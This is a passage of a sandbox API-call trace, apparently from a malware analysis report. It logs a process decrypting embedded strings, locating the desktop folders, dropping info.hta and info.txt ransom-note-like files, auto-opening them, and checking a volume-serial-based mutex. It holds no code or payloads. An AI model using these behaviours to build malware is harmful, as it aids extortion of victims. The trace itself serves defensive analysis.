hHeap=0x20f0000) returned 1 [0212.568] GetLogicalDrives () returned 0x4 [0212.568] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0212.568] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f790, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7f8 | out: phKey=0x33f7f8*=0xa32928) returned 1 [0212.568] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f7e0, dwFlags=0x0) returned 1 [0212.568] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x33f7ac | out: pbData=0x20f5910, pdwDataLen=0x33f7ac) returned 1 [0212.568] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.568] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x3e) returned 0x20f16c0 [0212.568] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x3e) returned 0x20f1600 [0212.568] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5498 [0212.568] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f768, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7d0 | out: phKey=0x33f7d0*=0xa32928) returned 1 [0212.568] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f7b8, dwFlags=0x0) returned 1 [0212.568] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x33f784 | out: pbData=0x20f5498, pdwDataLen=0x33f784) returned 1 [0212.568] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.568] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x10) returned 0x2226c20 [0212.568] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f74c | out: phkResult=0x33f74c*=0xd8) returned 0x0 [0212.568] RegQueryValueExW (in: hKey=0xd8, lpValueName="Desktop", lpReserved=0x0, lpType=0x33f748, lpData=0x20f1600, lpcbData=0x33f750*=0x3e | out: lpType=0x33f748*=0x2, lpData="%USERPROFILE%\\Desktop", lpcbData=0x33f750*=0x2c) returned 0x0 [0212.568] RegCloseKey (hKey=0xd8) returned 0x0 [0212.568] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226c20 | out: hHeap=0x20f0000) returned 1 [0212.568] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0212.568] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f74c | out: phkResult=0x33f74c*=0xd8) returned 0x0 [0212.569] RegQueryValueExW (in: hKey=0xd8, lpValueName="Common Desktop", lpReserved=0x0, lpType=0x33f748, lpData=0x20f162c, lpcbData=0x33f750*=0x12 | out: lpType=0x33f748*=0x0, lpData=0x20f162c*=0x4c, lpcbData=0x33f750*=0x12) returned 0x2 [0212.569] RegCloseKey (hKey=0xd8) returned 0x0 [0212.569] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f760 | out: phkResult=0x33f760*=0xd8) returned 0x0 [0212.569] RegQueryValueExW (in: hKey=0xd8, lpValueName="Common Desktop", lpReserved=0x0, lpType=0x33f75c, lpData=0x20f162c, lpcbData=0x33f764*=0x12 | out: lpType=0x33f75c*=0x2, lpData=0x20f162c*=0x4c, lpcbData=0x33f764*=0x22) returned 0xea [0212.569] RegCloseKey (hKey=0xd8) returned 0x0 [0212.569] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0212.569] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0212.569] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1600 | out: hHeap=0x20f0000) returned 1 [0212.569] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f16c0, Size=0x7a) returned 0x20f5498 [0212.569] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x7a) returned 0x20f5520 [0212.569] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227790 [0212.569] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7cc | out: phKey=0x33f7cc*=0xa32928) returned 1 [0212.569] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f7b4, dwFlags=0x0) returned 1 [0212.569] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227790, pdwDataLen=0x33f780 | out: pbData=0x2227790, pdwDataLen=0x33f780) returned 1 [0212.569] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.569] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x10) returned 0x2226c20 [0212.569] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f748 | out: phkResult=0x33f748*=0xd8) returned 0x0 [0212.569] RegQueryValueExW (in: hKey=0xd8, lpValueName="Desktop", lpReserved=0x0, lpType=0x33f744, lpData=0x20f5520, lpcbData=0x33f74c*=0x7a | out: lpType=0x33f744*=0x2, lpData="%USERPROFILE%\\Desktop", lpcbData=0x33f74c*=0x2c) returned 0x0 [0212.569] RegCloseKey (hKey=0xd8) returned 0x0 [0212.570] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226c20 | out: hHeap=0x20f0000) returned 1 [0212.570] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20fd9b0 [0212.570] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f748 | out: phkResult=0x33f748*=0xd8) returned 0x0 [0212.570] RegQueryValueExW (in: hKey=0xd8, lpValueName="Common Desktop", lpReserved=0x0, lpType=0x33f744, lpData=0x20f554c, lpcbData=0x33f74c*=0x4e | out: lpType=0x33f744*=0x0, lpData=0x20f554c*=0x0, lpcbData=0x33f74c*=0x4e) returned 0x2 [0212.570] RegCloseKey (hKey=0xd8) returned 0x0 [0212.570] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x33f75c | out: phkResult=0x33f75c*=0xd8) returned 0x0 [0212.570] RegQueryValueExW (in: hKey=0xd8, lpValueName="Common Desktop", lpReserved=0x0, lpType=0x33f758, lpData=0x20f554c, lpcbData=0x33f760*=0x4e | out: lpType=0x33f758*=0x2, lpData="%PUBLIC%\\Desktop", lpcbData=0x33f760*=0x22) returned 0x0 [0212.570] RegCloseKey (hKey=0xd8) returned 0x0 [0212.571] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0212.571] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227790 | out: hHeap=0x20f0000) returned 1 [0212.571] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\Desktop;%PUBLIC%\\Desktop", lpDst=0x20f5498, nSize=0x3d | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop;C:\\Users\\Public\\Desktol Fo藈䖸甮฀%USERPROFILE%\\Desktop;%PUBLIC%\\Desktop") returned 0x3e [0212.571] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5520 | out: hHeap=0x20f0000) returned 1 [0212.571] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x20f5498, Size=0xf2) returned 0x20f5498 [0212.571] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xf2) returned 0x2227790 [0212.571] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227890 [0212.572] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7cc | out: phKey=0x33f7cc*=0xa32928) returned 1 [0212.572] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f7b4, dwFlags=0x0) returned 1 [0212.572] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227890, pdwDataLen=0x33f780 | out: pbData=0x2227890, pdwDataLen=0x33f780) returned 1 [0212.572] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.572] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227890 | out: hHeap=0x20f0000) returned 1 [0212.572] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\Desktop;%PUBLIC%\\Desktop", lpDst=0x20f5498, nSize=0x79 | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop;C:\\Users\\Public\\Desktop") returned 0x3e [0212.572] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227790 | out: hHeap=0x20f0000) returned 1 [0212.572] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0212.572] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd9b0 [0212.572] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f7ac, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f814 | out: phKey=0x33f814*=0xa32928) returned 1 [0212.572] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f7fc, dwFlags=0x0) returned 1 [0212.572] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd9b0, pdwDataLen=0x33f7c8 | out: pbData=0x20fd9b0, pdwDataLen=0x33f7c8) returned 1 [0212.572] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.572] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20fd988 [0212.572] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f7a4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f80c | out: phKey=0x33f80c*=0xa32928) returned 1 [0212.572] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f7f4, dwFlags=0x0) returned 1 [0212.572] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fd988, pdwDataLen=0x33f7c0 | out: pbData=0x20fd988, pdwDataLen=0x33f7c0) returned 1 [0212.572] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.572] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f5910 [0212.572] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f79c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f804 | out: phKey=0x33f804*=0xa32928) returned 1 [0212.572] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f7ec, dwFlags=0x0) returned 1 [0212.572] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5910, pdwDataLen=0x33f7b8 | out: pbData=0x20f5910, pdwDataLen=0x33f7b8) returned 1 [0212.572] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.572] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x10) returned 0x2226c20 [0212.572] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f794, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7fc | out: phKey=0x33f7fc*=0xa32928) returned 1 [0212.572] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f7e4, dwFlags=0x0) returned 1 [0212.572] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2226c20, pdwDataLen=0x33f7b0 | out: pbData=0x2226c20, pdwDataLen=0x33f7b0) returned 1 [0212.572] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.572] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20a) returned 0x2227790 [0212.572] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x2010) returned 0x2227a48 [0212.572] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f754, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7bc | out: phKey=0x33f7bc*=0xa32928) returned 1 [0212.572] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f7a4, dwFlags=0x0) returned 1 [0212.573] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227a48, pdwDataLen=0x33f770 | out: pbData=0x2227a48, pdwDataLen=0x33f770) returned 1 [0212.573] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.573] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x2009) returned 0x2229a60 [0212.573] RtlReAllocateHeap (Heap=0x20f0000, Flags=0x0, Ptr=0x2229a60, Size=0x4011) returned 0x2229a60 [0212.573] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227a48 | out: hHeap=0x20f0000) returned 1 [0212.573] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x140) returned 0x20fc2e8 [0212.573] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f74c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f7b4 | out: phKey=0x33f7b4*=0xa32928) returned 1 [0212.573] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x33f79c, dwFlags=0x0) returned 1 [0212.573] CryptDecrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20fc2e8, pdwDataLen=0x33f768 | out: pbData=0x20fc2e8, pdwDataLen=0x33f768) returned 1 [0212.573] CryptDestroyKey (hKey=0xa32928) returned 1 [0212.573] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x13e) returned 0x20fc430 [0212.573] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fc2e8 | out: hHeap=0x20f0000) returned 1 [0212.573] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x7e) returned 0x2227a60 [0212.573] GetLastError () returned 0x0 [0212.587] CreateFileW (lpFileName="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\info.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\info.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xd8 [0212.588] WriteFile (in: hFile=0xd8, lpBuffer=0x2229a60*, nNumberOfBytesToWrite=0x200a, lpNumberOfBytesWritten=0x33f81c, lpOverlapped=0x0 | out: lpBuffer=0x2229a60*, lpNumberOfBytesWritten=0x33f81c*=0x200a, lpOverlapped=0x0) returned 1 [0212.605] CloseHandle (hObject=0xd8) returned 1 [0212.609] ShellExecuteExW (in: pExecInfo=0x33f7e4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\info.hta", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x33f7e4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\info.hta", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0213.752] CreateFileW (lpFileName="c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\info.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\info.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xec [0213.753] WriteFile (in: hFile=0xec, lpBuffer=0x20fc430*, nNumberOfBytesToWrite=0x13d, lpNumberOfBytesWritten=0x33f81c, lpOverlapped=0x0 | out: lpBuffer=0x20fc430*, lpNumberOfBytesWritten=0x33f81c*=0x13d, lpOverlapped=0x0) returned 1 [0213.754] CloseHandle (hObject=0xec) returned 1 [0213.754] CreateFileW (lpFileName="c:\\users\\public\\desktop\\info.hta" (normalized: "c:\\users\\public\\desktop\\info.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xec [0213.754] WriteFile (in: hFile=0xec, lpBuffer=0x2229a60*, nNumberOfBytesToWrite=0x200a, lpNumberOfBytesWritten=0x33f81c, lpOverlapped=0x0 | out: lpBuffer=0x2229a60*, lpNumberOfBytesWritten=0x33f81c*=0x200a, lpOverlapped=0x0) returned 1 [0213.755] CloseHandle (hObject=0xec) returned 1 [0213.755] ShellExecuteExW (in: pExecInfo=0x33f7e4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="c:\\users\\public\\desktop\\info.hta", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x33f7e4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="c:\\users\\public\\desktop\\info.hta", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0213.896] CreateFileW (lpFileName="c:\\users\\public\\desktop\\info.txt" (normalized: "c:\\users\\public\\desktop\\info.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xec [0213.896] WriteFile (in: hFile=0xec, lpBuffer=0x20fc430*, nNumberOfBytesToWrite=0x13d, lpNumberOfBytesWritten=0x33f81c, lpOverlapped=0x0 | out: lpBuffer=0x20fc430*, lpNumberOfBytesWritten=0x33f81c*=0x13d, lpOverlapped=0x0) returned 1 [0213.897] CloseHandle (hObject=0xec) returned 1 [0213.897] CreateFileW (lpFileName="c:\\\\info.hta" (normalized: "c:\\info.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xec [0213.901] WriteFile (in: hFile=0xec, lpBuffer=0x2229a60*, nNumberOfBytesToWrite=0x200a, lpNumberOfBytesWritten=0x33f81c, lpOverlapped=0x0 | out: lpBuffer=0x2229a60*, lpNumberOfBytesWritten=0x33f81c*=0x200a, lpOverlapped=0x0) returned 1 [0213.902] CloseHandle (hObject=0xec) returned 1 [0213.902] ShellExecuteExW (in: pExecInfo=0x33f7e4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="c:\\\\info.hta", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x33f7e4*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="open", lpFile="c:\\\\info.hta", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0222.271] CreateFileW (lpFileName="c:\\\\info.txt" (normalized: "c:\\info.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xec [0222.272] WriteFile (in: hFile=0xec, lpBuffer=0x20fc430*, nNumberOfBytesToWrite=0x13d, lpNumberOfBytesWritten=0x33f81c, lpOverlapped=0x0 | out: lpBuffer=0x20fc430*, lpNumberOfBytesWritten=0x33f81c*=0x13d, lpOverlapped=0x0) returned 1 [0222.272] CloseHandle (hObject=0xec) returned 1 [0222.272] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2226c20 | out: hHeap=0x20f0000) returned 1 [0222.272] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0222.273] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd9b0 | out: hHeap=0x20f0000) returned 1 [0222.273] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fd988 | out: hHeap=0x20f0000) returned 1 [0222.273] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5910 | out: hHeap=0x20f0000) returned 1 [0222.273] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2229a60 | out: hHeap=0x20f0000) returned 1 [0222.273] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20fc430 | out: hHeap=0x20f0000) returned 1 [0222.273] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227790 | out: hHeap=0x20f0000) returned 1 [0222.273] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f97b0 | out: hHeap=0x20f0000) returned 1 [0222.273] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xc0) returned 0x20f5498 [0222.273] CryptImportKey (in: hProv=0xa24cf8, pbData=0x33f7ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33f854 | out: phKey=0x33f854*=0xa32b28) returned 1 [0222.273] CryptSetKeyParam (hKey=0xa32b28, dwParam=0x1, pbData=0x33f83c, dwFlags=0x0) returned 1 [0222.273] CryptDecrypt (in: hKey=0xa32b28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5498, pdwDataLen=0x33f808 | out: pbData=0x20f5498, pdwDataLen=0x33f808) returned 1 [0222.273] CryptDestroyKey (hKey=0xa32b28) returned 1 [0222.273] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0xbd) returned 0x2227790 [0222.273] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x833033, lpParameter=0x2227790, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0xec [0222.273] WaitForSingleObject (hHandle=0xec, dwMilliseconds=0x0) returned 0x102 [0222.273] CloseHandle (hObject=0xec) returned 1 [0222.273] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5498 | out: hHeap=0x20f0000) returned 1 [0222.273] WaitForMultipleObjects (nCount=0x3, lpHandles=0x33f8c8*=0x8c, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 108 os_tid = 0x608 [0124.028] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f14d8 [0124.028] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa273c0) returned 1 [0124.028] CryptSetKeyParam (hKey=0xa273c0, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0124.028] CryptDecrypt (in: hKey=0xa273c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14d8, pdwDataLen=0x221f80c | out: pbData=0x20f14d8, pdwDataLen=0x221f80c) returned 1 [0124.029] CryptDestroyKey (hKey=0xa273c0) returned 1 [0124.029] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f16c0 [0124.029] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f16e8 [0124.029] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x20f5ee8 [0124.029] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa273c0) returned 1 [0124.029] CryptSetKeyParam (hKey=0xa273c0, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0124.029] CryptDecrypt (in: hKey=0xa273c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f5ee8, pdwDataLen=0x221f7e4 | out: pbData=0x20f5ee8, pdwDataLen=0x221f7e4) returned 1 [0124.029] CryptDestroyKey (hKey=0xa273c0) returned 1 [0124.029] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f5ee8 | out: hHeap=0x20f0000) returned 1 [0124.029] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x20f16c0, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0124.029] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16e8 | out: hHeap=0x20f0000) returned 1 [0124.029] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f14d8 | out: hHeap=0x20f0000) returned 1 [0124.029] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0124.029] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0124.029] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x20f16c0 [0124.029] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa273c0) returned 1 [0124.029] CryptSetKeyParam (hKey=0xa273c0, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0124.029] CryptDecrypt (in: hKey=0xa273c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f16c0, pdwDataLen=0x221f840 | out: pbData=0x20f16c0, pdwDataLen=0x221f840) returned 1 [0124.029] CryptDestroyKey (hKey=0xa273c0) returned 1 [0124.029] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x20f1708 [0124.029] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x98 [0124.029] WaitForSingleObject (hHandle=0x98, dwMilliseconds=0x0) returned 0x102 [0124.029] CloseHandle (hObject=0x98) returned 1 [0124.030] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f16c0 | out: hHeap=0x20f0000) returned 1 [0124.030] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x20f1708 | out: hHeap=0x20f0000) returned 1 [0124.030] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x20f14d8 [0124.030] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa273c0) returned 1 [0124.030] CryptSetKeyParam (hKey=0xa273c0, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0124.030] CryptDecrypt (in: hKey=0xa273c0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x20f14d8, pdwDataLen=0x221f80c | out: pbData=0x20f14d8, pdwDataLen=0x221f80c) returned 1 [0124.030] CryptDestroyKey (hKey=0xa273c0) returned 1 [0124.030] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x20f16c0 [0124.030] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x20f16e8 [0124.030] RtlAllocateHeap (HeapHandle=0x20f0000, 